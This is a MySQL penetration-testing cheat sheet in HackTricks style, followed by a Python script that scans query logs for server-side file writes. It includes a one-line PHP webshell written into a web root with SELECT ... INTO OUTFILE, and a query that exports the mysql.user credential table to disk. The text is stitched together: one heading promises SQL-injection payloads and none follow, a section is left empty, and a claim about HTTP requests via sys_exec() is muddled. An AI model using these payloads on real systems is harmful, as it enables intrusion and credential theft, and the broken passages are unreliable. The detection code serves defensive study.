MySQL HackTricks Verified

SELECT @@version, @@version_compile_os, @@version_compile_machine;
SELECT user(), database(), current_user();
SELECT @@basedir, @@datadir, @@plugin_dir;

HackTricks Insight:
current_user() shows the user MySQL is authenticating you as, while user() shows the user you tried to connect as. Mismatches often indicate proxy authentication or privilege mapping.

This is the pivot point for most MySQL hacks. If secure_file_priv is not restricting you to a specific directory, you can write files to the disk.

The "HackTrick": You can write a PHP webshell (or any other script) directly into a web directory if you know the path.

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Why it's interesting:


MySQL can issue HTTP requests via sys_exec() or SELECT ... INTO OUTFILE to write a port scanner script. But a verified light pivot:

SELECT * FROM mysql.user INTO OUTFILE '/tmp/users.txt';

Then read it via SSH if you have shell access.


If you can't log in directly, SQL injection is your vector. The verified payloads for MySQL are:

To detect and prevent MySQL attacks:
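
A defensive check for the file-write technique described above, as an added example that is not from the original page: it classifies the secure_file_priv value and flags INTO OUTFILE / INTO DUMPFILE statements in a query log. The log lines, web-root list, extension list and severity labels are assumptions constructed for illustration.

```python
import re

# Captures the target path of SELECT ... INTO OUTFILE / INTO DUMPFILE.
FILE_WRITE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+(['\"])(.+?)\1", re.I)
CRED_TABLE = re.compile(r"\bmysql\.user\b", re.I)
# Assumptions: typical web roots and script extensions; tune per host.
WEB_ROOTS = ("/var/www/", "/usr/share/nginx/", "/srv/http/")
SCRIPT_EXT = (".php", ".phtml", ".jsp")

# Constructed general-query-log lines (timestamps and thread ids are made up).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 12 Query SELECT @@version, @@version_compile_os
2024-05-01T10:00:09Z 12 Query SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'
2024-05-01T10:00:15Z 12 Query SELECT * FROM mysql.user INTO OUTFILE '/tmp/users.txt'
2024-05-01T10:02:40Z 31 Query SELECT id, total FROM orders INTO OUTFILE '/tmp/report.csv'
""".splitlines()


def classify_secure_file_priv(value):
    """Map the secure_file_priv value (as returned by the server) to exposure."""
    if value is None:      # NULL: import/export operations are disabled
        return "disabled"
    if value == "":        # empty string: no directory restriction at all
        return "unrestricted"
    return "restricted"    # a directory: file operations confined to it


def scan_query_log(lines):
    """Return (line_no, severity, path) for every server-side file write."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = FILE_WRITE.search(line)
        if not match:
            continue
        path = match.group(2)
        script_in_web_root = (path.startswith(WEB_ROOTS)
                              and path.lower().endswith(SCRIPT_EXT))
        # Script dropped in a web root, or credential table exported: high.
        high = script_in_web_root or CRED_TABLE.search(line)
        findings.append((line_no, "high" if high else "medium", path))
    return findings


if __name__ == "__main__":
    print(classify_secure_file_priv(""))
    for finding in scan_query_log(SAMPLE_LOG):
        print(finding)
```
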